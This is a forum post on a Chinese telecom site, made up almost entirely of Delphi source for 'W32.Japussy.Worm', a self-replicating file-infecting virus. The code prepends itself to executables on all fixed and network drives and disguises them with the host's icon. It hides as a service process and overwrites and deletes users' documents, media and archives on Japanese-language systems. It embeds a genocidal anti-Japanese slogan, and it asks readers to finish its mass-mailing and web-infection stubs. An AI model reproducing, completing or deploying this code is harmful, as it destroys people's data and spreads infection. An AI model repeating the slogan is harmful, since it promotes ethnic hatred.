通信人家园

 找回密码
 注册

只需一步,快速开始

短信验证,便捷登录

搜索

军衔等级:

  大元帅

注册:2005-9-141

爱心徽章,06年为希望小学奉献爱心纪念徽章 家园06年十大网友 家园荣誉版主纪念徽章

跳转到指定楼层
1#
发表于 2007-2-15 21:29:00 |只看该作者 |倒序浏览
<div class="HtmlCode">program Japussy;<br/>uses<br/>Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};<br/>const<br/>HeaderSize = 82432; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //病毒体的大小<br/>IconOffset = $12EB8; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //PE文件主图标的偏移量<br/><br/>//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同<br/>//查找2800000020的十六进制字符串可以找到主图标的偏移量<br/>&nbsp; <br/>{<br/>HeaderSize = 38912; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //Upx压缩过病毒体的大小<br/>IconOffset = $92BC; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //Upx压缩过PE文件主图标的偏移量<br/><br/>//Upx 1.24W 用法: upx -9 --8086 Japussy.exe<br/>}<br/>IconSize &nbsp; = $2E8; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //PE文件主图标的大小--744字节<br/>IconTail &nbsp; = IconOffset + IconSize; //PE文件主图标的尾部<br/>ID &nbsp; &nbsp; &nbsp; = $44444444; &nbsp; &nbsp; &nbsp; &nbsp; //感染标记<br/><br/>//垃圾码,以备写入<br/>Catchword = 'If a race need to be killed out, it must be Yamato. ' +<br/>&nbsp; &nbsp; &nbsp; &nbsp; 'If a country need to be destroyed, it must be Japan! ' +<br/>&nbsp; &nbsp; &nbsp; &nbsp; '*** W32.Japussy.Worm.A ***';<br/>{$R *.RES}<br/>function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; <br/>stdcall; external 'Kernel32.dll'; //函数声明<br/>var<br/>TmpFile: string;<br/>Si: &nbsp; &nbsp; STARTUPINFO;<br/>i: &nbsp; &nbsp; PROCESS_INFORMATION;<br/>IsJap: &nbsp; Boolean = False; //日文操作系统标记<br/>{ 判断是否为Win9x }<br/>function IsWin9x: Boolean;<br/>var<br/>Ver: TOSVersionInfo;<br/>begin<br/>Result := False;<br/>Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);<br/>if not GetVersionEx(Ver) then<br/>&nbsp; Exit;<br/>if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x<br/>&nbsp; Result := True;<br/>end;<br/>{ 在流之间复制 }<br/>procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;<br/>dStartPos: Integer; Count: Integer);<br/>var<br/>sCurPos, dCurPos: Integer;<br/>begin<br/>sCurPos := Src.Position;<br/>dCurPos := Dst.Position;<br/>Src.Seek(sStartPos, 0);<br/>Dst.Seek(dStartPos, 0);<br/>Dst.CopyFrom(Src, Count);<br/>Src.Seek(sCurPos, 0);<br/>Dst.Seek(dCurPos, 0);<br/>end;<br/>{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }<br/>procedure ExtractFile(FileName: string);<br/>var<br/>sStream, dStream: TFileStream;<br/>begin<br/>try<br/>&nbsp; sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);<br/>&nbsp; try<br/>&nbsp; &nbsp; dStream := TFileStream.Create(FileName, fmCreate);<br/>&nbsp; &nbsp; try<br/>&nbsp; &nbsp; sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分<br/>&nbsp; &nbsp; dStream.CopyFrom(sStream, sStream.Size - HeaderSize);<br/>&nbsp; &nbsp; finally<br/>&nbsp; &nbsp; dStream.Free;<br/>&nbsp; &nbsp; end;<br/>&nbsp; finally<br/>&nbsp; &nbsp; sStream.Free;<br/>&nbsp; end;<br/>except<br/>end;<br/>end;<br/>{ 填充STARTUPINFO结构 }<br/>procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);<br/>begin<br/>Si.cb := SizeOf(Si);<br/>Si.lpReserved := nil;<br/>Si.lpDesktop := nil;<br/>Si.lpTitle := nil;<br/>Si.dwFlags := STARTF_USESHOWWINDOW;<br/>Si.wShowWindow := State;<br/>Si.cbReserved2 := 0;<br/>Si.lpReserved2 := nil;<br/>end;<br/>{ 发带毒邮件 }<br/>procedure SendMail;<br/>begin<br/>//哪位仁兄愿意完成之?<br/>end;<br/>{ 感染PE文件 }<br/>procedure InfectOneFile(FileName: string);<br/>var<br/>HdrStream, SrcStream: TFileStream;<br/>IcoStream, DstStream: TMemoryStream;<br/>iID: LongInt;<br/>aIcon: TIcon;<br/>Infected, IsPE: Boolean;<br/>i: Integer;<br/>Buf: array[0..1] of Char;<br/>begin<br/>try //出错则文件正在被使用,退出<br/>&nbsp; if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染<br/>&nbsp; &nbsp; Exit;<br/>&nbsp; Infected := False;<br/>&nbsp; IsPE &nbsp; := False;<br/>&nbsp; SrcStream := TFileStream.Create(FileName, fmOpenRead);<br/>&nbsp; try<br/>&nbsp; &nbsp; for i := 0 to $108 do //检查PE文件头<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; SrcStream.Seek(i, soFromBeginning);<br/>&nbsp; &nbsp; SrcStream.Read(Buf, 2);<br/>&nbsp; &nbsp; if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; IsPE := True; //是PE文件<br/>&nbsp; &nbsp; &nbsp; Break;<br/>&nbsp; &nbsp; end;<br/>&nbsp; &nbsp; end;<br/>&nbsp; &nbsp; SrcStream.Seek(-4, soFromEnd); //检查感染标记<br/>&nbsp; &nbsp; SrcStream.Read(iID, 4);<br/>&nbsp; &nbsp; if (iID = ID) or (SrcStream.Size &lt; 10240) then //太小的文件不感染<br/>&nbsp; &nbsp; Infected := True;<br/>&nbsp; finally<br/>&nbsp; &nbsp; SrcStream.Free;<br/>&nbsp; end;<br/>&nbsp; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出<br/>&nbsp; &nbsp; Exit;<br/>&nbsp; IcoStream := TMemoryStream.Create;<br/>&nbsp; DstStream := TMemoryStream.Create;<br/>&nbsp; try<br/>&nbsp; &nbsp; aIcon := TIcon.Create;<br/>&nbsp; &nbsp; try<br/>&nbsp; &nbsp; //得到被感染文件的主图标(744字节),存入流<br/>&nbsp; &nbsp; aIcon.ReleaseHandle;<br/>&nbsp; &nbsp; aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);<br/>&nbsp; &nbsp; aIcon.SaveToStream(IcoStream);<br/>&nbsp; &nbsp; finally<br/>&nbsp; &nbsp; aIcon.Free;<br/>&nbsp; &nbsp; end;<br/>&nbsp; &nbsp; SrcStream := TFileStream.Create(FileName, fmOpenRead);<br/>&nbsp; &nbsp; //头文件<br/>&nbsp; &nbsp; HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);<br/>&nbsp; &nbsp; try<br/>&nbsp; &nbsp; //写入病毒体主图标之前的数据<br/>&nbsp; &nbsp; CopyStream(HdrStream, 0, DstStream, 0, IconOffset);<br/>&nbsp; &nbsp; //写入目前程序的主图标<br/>&nbsp; &nbsp; CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);<br/>&nbsp; &nbsp; //写入病毒体主图标到病毒体尾部之间的数据<br/>&nbsp; &nbsp; CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);<br/>&nbsp; &nbsp; //写入宿主程序<br/>&nbsp; &nbsp; CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);<br/>&nbsp; &nbsp; //写入已感染的标记<br/>&nbsp; &nbsp; DstStream.Seek(0, 2);<br/>&nbsp; &nbsp; iID := $44444444;<br/>&nbsp; &nbsp; DstStream.Write(iID, 4);<br/>&nbsp; &nbsp; finally<br/>&nbsp; &nbsp; HdrStream.Free;<br/>&nbsp; &nbsp; end;<br/>&nbsp; finally<br/>&nbsp; &nbsp; SrcStream.Free;<br/>&nbsp; &nbsp; IcoStream.Free;<br/>&nbsp; &nbsp; DstStream.SaveToFile(FileName); //替换宿主文件<br/>&nbsp; &nbsp; DstStream.Free;<br/>&nbsp; end;<br/>except;<br/>end;<br/>end;<br/>{ 将目标文件写入垃圾码后删除 }<br/>procedure SmashFile(FileName: string);<br/>var<br/>FileHandle: Integer;<br/>i, Size, Mass, Max, Len: Integer;<br/>begin<br/>try<br/>&nbsp; SetFileAttributes(PChar(FileName), 0); //去掉只读属性<br/>&nbsp; FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件<br/>&nbsp; try<br/>&nbsp; &nbsp; Size := GetFileSize(FileHandle, nil); //文件大小<br/>&nbsp; &nbsp; i := 0;<br/>&nbsp; &nbsp; Randomize;<br/>&nbsp; &nbsp; Max := Random(15); //写入垃圾码的随机次数<br/>&nbsp; &nbsp; if Max &lt; 5 then<br/>&nbsp; &nbsp; Max := 5;<br/>&nbsp; &nbsp; Mass := Size div Max; //每个间隔块的大小<br/>&nbsp; &nbsp; Len := Length(Catchword);<br/>&nbsp; &nbsp; while i &lt; Max do<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; FileSeek(FileHandle, i * Mass, 0); //定位<br/>&nbsp; &nbsp; //写入垃圾码,将文件彻底破坏掉<br/>&nbsp; &nbsp; FileWrite(FileHandle, Catchword, Len);<br/>&nbsp; &nbsp; Inc(i);<br/>&nbsp; &nbsp; end;<br/>&nbsp; finally<br/>&nbsp; &nbsp; FileClose(FileHandle); //关闭文件<br/>&nbsp; end;<br/>&nbsp; DeleteFile(PChar(FileName)); //删除之<br/>except<br/>end;<br/>end;<br/>{ 获得可写的驱动器列表 }<br/>function GetDrives: string;<br/>var<br/>DiskType: Word;<br/>D: Char;<br/>Str: string;<br/>i: Integer;<br/>begin<br/>for i := 0 to 25 do //遍历26个字母<br/>begin<br/>&nbsp; D := Chr(i + 65);<br/>&nbsp; Str := D + ':\';<br/>&nbsp; DiskType := GetDriveType(PChar(Str));<br/>&nbsp; //得到本地磁盘和网络盘<br/>&nbsp; if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then<br/>&nbsp; &nbsp; Result := Result + D;<br/>end;<br/>end;<br/>{ 遍历目录,感染和摧毁文件 }<br/>procedure LoopFiles(Path, Mask: string);<br/>var<br/>i, Count: Integer;<br/>Fn, Ext: string;<br/>SubDir: TStrings;<br/>SearchRec: TSearchRec;<br/>Msg: TMsg;<br/>function IsValidDir(SearchRec: TSearchRec): Integer;<br/>begin<br/>&nbsp; if (SearchRec.Attr &lt;&gt; 16) and (SearchRec.Name &lt;&gt; '.') and<br/>&nbsp; &nbsp; (SearchRec.Name &lt;&gt; '..') then<br/>&nbsp; &nbsp; Result := 0 //不是目录<br/>&nbsp; else if (SearchRec.Attr = 16) and (SearchRec.Name &lt;&gt; '.') and<br/>&nbsp; &nbsp; (SearchRec.Name &lt;&gt; '..') then<br/>&nbsp; &nbsp; Result := 1 //不是根目录<br/>&nbsp; else Result := 2; //是根目录<br/>end;<br/>begin<br/>if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then<br/>begin<br/>&nbsp; repeat<br/>&nbsp; &nbsp; PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑<br/>&nbsp; &nbsp; if IsValidDir(SearchRec) = 0 then<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; Fn := Path + SearchRec.Name;<br/>&nbsp; &nbsp; Ext := UpperCase(ExtractFileExt(Fn));<br/>&nbsp; &nbsp; if (Ext = '.EXE') or (Ext = '.SCR') then<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; InfectOneFile(Fn); //感染可执行文件 &nbsp; &nbsp; <br/>&nbsp; &nbsp; end<br/>&nbsp; &nbsp; else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; //感染HTML和ASP文件,将Base64编码后的病毒写入<br/>&nbsp; &nbsp; &nbsp; //感染浏览此网页的所有用户<br/>&nbsp; &nbsp; &nbsp; //哪位大兄弟愿意完成之?<br/>&nbsp; &nbsp; end<br/>&nbsp; &nbsp; else if Ext = '.WAB' then //Outlook地址簿文件<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; //获取Outlook邮件地址<br/>&nbsp; &nbsp; end<br/>&nbsp; &nbsp; else if Ext = '.ADC' then //Foxmail地址自动完成文件<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; //获取Foxmail邮件地址<br/>&nbsp; &nbsp; end<br/>&nbsp; &nbsp; else if Ext = 'IND' then //Foxmail地址簿文件<br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; //获取Foxmail邮件地址<br/>&nbsp; &nbsp; end<br/>&nbsp; &nbsp; else <br/>&nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; if IsJap then //是倭文操作系统<br/>&nbsp; &nbsp; &nbsp; begin<br/>&nbsp; &nbsp; &nbsp; &nbsp; if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or<br/>&nbsp; &nbsp; &nbsp; &nbsp; (Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or<br/>&nbsp; &nbsp; &nbsp; &nbsp; (Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or<br/>&nbsp; &nbsp; &nbsp; &nbsp; (Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or<br/>&nbsp; &nbsp; &nbsp; &nbsp; (Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or<br/>&nbsp; &nbsp; &nbsp; &nbsp; (Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then<br/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SmashFile(Fn); //摧毁文件<br/>&nbsp; &nbsp; &nbsp; end;<br/>&nbsp; &nbsp; end;<br/>&nbsp; &nbsp; end;<br/>&nbsp; &nbsp; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑<br/>&nbsp; &nbsp; Sleep(200);<br/>&nbsp; until (FindNext(SearchRec) &lt;&gt; 0);<br/>end;<br/>FindClose(SearchRec);<br/>SubDir := TStringList.Create;<br/>if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then<br/>begin<br/>&nbsp; repeat<br/>&nbsp; &nbsp; if IsValidDir(SearchRec) = 1 then<br/>&nbsp; &nbsp; SubDir.Add(SearchRec.Name);<br/>&nbsp; until (FindNext(SearchRec) &lt;&gt; 0);<br/>&nbsp; end;<br/>FindClose(SearchRec);<br/>Count := SubDir.Count - 1;<br/>for i := 0 to Count do<br/>&nbsp; LoopFiles(Path + SubDir.Strings + '\', Mask);<br/>FreeAndNil(SubDir);<br/>end;<br/>{ 遍历磁盘上所有的文件 }<br/>procedure InfectFiles;<br/>var<br/>DriverList: string;<br/>i, Len: Integer;<br/>begin<br/>if GetACP = 932 then //日文操作系统<br/>&nbsp; IsJap := True; //去死吧!<br/>DriverList := GetDrives; //得到可写的磁盘列表<br/>Len := Length(DriverList);<br/>while True do //死循环<br/>begin<br/>&nbsp; for i := Len downto 1 do //遍历每个磁盘驱动器<br/>&nbsp; &nbsp; LoopFiles(DriverList + ':\', '*.*'); //感染之<br/>&nbsp; SendMail; //发带毒邮件<br/>&nbsp; Sleep(1000 * 60 * 5); //睡眠5分钟<br/>end;<br/>end;<br/>{ 主程序开始 }<br/>begin<br/>if IsWin9x then //是Win9x<br/>&nbsp; RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程<br/>else //WinNT<br/>begin<br/>&nbsp; //远程线程映射到Explorer进程<br/>&nbsp; //哪位兄台愿意完成之?<br/>end;<br/>//如果是原始病毒体自己<br/>if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then<br/>&nbsp; InfectFiles //感染和发邮件<br/>else //已寄生于宿主程序上了,开始工作<br/>begin<br/>&nbsp; TmpFile := ParamStr(0); //创建临时文件<br/>&nbsp; Delete(TmpFile, Length(TmpFile) - 4, 4);<br/>&nbsp; TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格<br/>&nbsp; ExtractFile(TmpFile); //分离之<br/>&nbsp; FillStartupInfo(Si, SW_SHOWDEFAULT);<br/>&nbsp; CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,<br/>&nbsp; &nbsp; 0, nil, '.', Si, Pi); //创建新进程运行之<br/>&nbsp; InfectFiles; //感染和发邮件<br/>end;<br/>end.<br/></div>

举报本楼

本帖有 12 个回帖,您需要登录后才能浏览 登录 | 注册
您需要登录后才可以回帖 登录 | 注册 |

手机版|C114 ( 沪ICP备12002291号-1 )|联系我们 |网站地图  

GMT+8, 2024-4-29 17:22 , Processed in 0.381736 second(s), 16 queries , Gzip On.

Copyright © 1999-2023 C114 All Rights Reserved

Discuz Licensed

回顶部